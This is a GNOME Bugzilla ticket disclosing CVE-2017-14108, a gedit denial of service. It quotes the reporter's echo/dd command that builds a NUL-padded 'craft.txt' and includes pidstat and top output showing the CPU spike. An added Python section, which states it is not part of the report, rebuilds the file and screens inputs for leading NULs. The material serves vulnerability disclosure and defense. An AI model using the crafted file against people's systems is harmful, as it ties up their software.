Bug 791037 - libgedit.a in GNOME gedit through 3.22.1 allows remote attackers to cause a denial of service (CPU consumption) via a file that begins with many '\0' characters.
Status: RESOLVED OBSOLETE
Product: gedit
Classification: Applications
Component: file loading and saving
Version: git master
Hardware/OS: Other Linux
Priority/Severity: Normal major
Target Milestone: ---
Assigned To: Gedit maintainers
QA Contact: Gedit maintainers
Depends on:
Blocks:
Reported: 2017-11-30 18:00 UTC by Marcos Simental
Modified: 2020-11-24 09:57 UTC
See Also:
GNOME target: ---
GNOME version: ---

Description Marcos Simental 2017-11-30 18:00:01 UTC
Original report from Hosein Askari (raw report below)
https://cxsecurity.com/issue/WLB-2017090008
CVE report: https://nvd.nist.gov/vuln/detail/CVE-2017-14108
################
#Title: libgedit.a mishandling NUL blocks in gedit (GNOME text editor)
#CWE: CWE-400
#CVE: CVE-2017-14108
#Exploit Author: Hosein Askari 
#Vendor HomePage: https://gnome.org , https://wiki.gnome.org/Apps/Gedit
#Version : All versions (3.22.1 and older)
#Tested on: Ubuntu 16.04 (Linux 4.4.0-93-generic)
#Date: 01-09-2017
#Category: Application
#Author Mail : hosein.askari@aol.com
#Description: libgedit.a in GNOME gedit through 3.22.1 allows remote attackers to cause a denial of service (CPU consumption) via a file that begins with many '\0' characters.
###############
# Writes craft.txt: 100 blocks x 1000 bytes (seek=100, bs=1000) of NUL, then the
# marker bytes (the hex string spells "hosein askari"). No privileges are needed,
# so the sudo in the original line (which applied to echo, not dd) is dropped.
echo -ne '\x68\x6f\x73\x65\x69\x6e\x20\x61\x73\x6b\x61\x72\x69' | dd conv=notrunc bs=1000 seek=100 of=craft.txt
################
POC:
constantine@constantine:~$ pidstat -h -r -u -v -p 3107
Linux 4.4.0-93-generic (constantine) 	۱۷/۰۹/۰۱ 	_i686_	(2 CPU)

#      Time   UID       PID    %usr %system  %guest   %wait    %CPU   CPU  minflt/s  majflt/s     VSZ     RSS   %MEM threads   fd-nr  Command
 1504280041  1000      3107   16.43    0.01    0.00    0.03   106.44     1     15.53      0.00  121296   38804   0.95       4      18  gedit

constantine@constantine:~$ top
  PID USER      PR  NI    VIRT    RES    SHR S  %CPU %MEM     TIME+ COMMAND                                                                                              
 3107 constan+  20   0  128884  38492  28320 R 106.7  0.9   0:17.76 gedit 
################
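The same test file built portably, plus the cheap pre-load screening a loader could apply to it, as an added example in Python; it is not code from the bug report or from gedit. The NUL run length (100 * 1000 bytes) and the marker bytes mirror the reporter's dd command; the function names, the 4096-byte threshold and the plain-text sample file are assumptions made for this example.

```python
"""Build the CVE-2017-14108 test file and screen inputs for a leading NUL run."""
import os
import tempfile

# Same layout as the reporter's dd command: bs=1000 * seek=100 NUL bytes, then the marker.
NUL_RUN = 100 * 1000
MARKER = b"hosein askari"  # the bytes written by the original echo -ne


def write_craft_file(path, nul_run=NUL_RUN, marker=MARKER):
    """Write a file that begins with nul_run NUL bytes followed by marker.

    dd with seek= on a fresh file leaves a hole, so the NULs are sparse on disk;
    writing them explicitly yields the same bytes on read, which is all a loader sees.
    Returns the total size written.
    """
    with open(path, "wb") as f:
        f.write(b"\0" * nul_run)
        f.write(marker)
    return nul_run + len(marker)


def leading_nul_count(path, limit=1 << 20, chunk=64 * 1024):
    """Count NUL bytes at the start of the file, reading at most `limit` bytes."""
    count = 0
    with open(path, "rb") as f:
        while count < limit:
            buf = f.read(min(chunk, limit - count))
            if not buf:
                break
            stripped = buf.lstrip(b"\0")
            count += len(buf) - len(stripped)
            if stripped:  # reached the first non-NUL byte
                break
    return count


def looks_like_nul_padded(path, threshold=4096):
    """Cheap pre-load triage: flag a file whose first `threshold` bytes are all NUL.

    The threshold is an assumed value for this example, not one taken from gedit;
    an editor wanting to avoid pathological inputs could warn or refuse above it.
    """
    return leading_nul_count(path, limit=threshold) >= threshold


def demo():
    """Build the crafted file and a constructed plain file in a temp dir; report the checks."""
    with tempfile.TemporaryDirectory() as d:
        craft = os.path.join(d, "craft.txt")
        plain = os.path.join(d, "plain.txt")
        size = write_craft_file(craft)
        with open(plain, "wb") as f:
            f.write(b"plain text, no NULs\n")  # constructed sample input
        return {
            "craft_size": size,
            "craft_leading_nul": leading_nul_count(craft),
            "craft_flagged": looks_like_nul_padded(craft),
            "plain_leading_nul": leading_nul_count(plain),
            "plain_flagged": looks_like_nul_padded(plain),
        }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

The screening function reads only a bounded prefix, so it stays cheap even on a multi-gigabyte file; a loader that wants to reject such inputs before handing them to its decoding path can call it on the file size plus the first few KiB rather than on the whole content.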
Comment 1 Sébastien Wilmet 2020-11-24 09:57:17 UTC
Mass-closing of all gedit bugzilla tickets.

Special "code" to find again all those gedit bugzilla tickets that were open before the mass-closing:

2bfe1b0590a78457e1f1a6a90fb975f5878cb60064ccfe1d7db76ca0da52f0f3

By searching the above sha256sum in bugzilla, the gedit contributors can find again the tickets. We may be interested to do so when we work on a specific area of the code, to at least know the known problems and possible enhancements.

We do this mass-closing because bugzilla.gnome.org is being replaced by gitlab.gnome.org.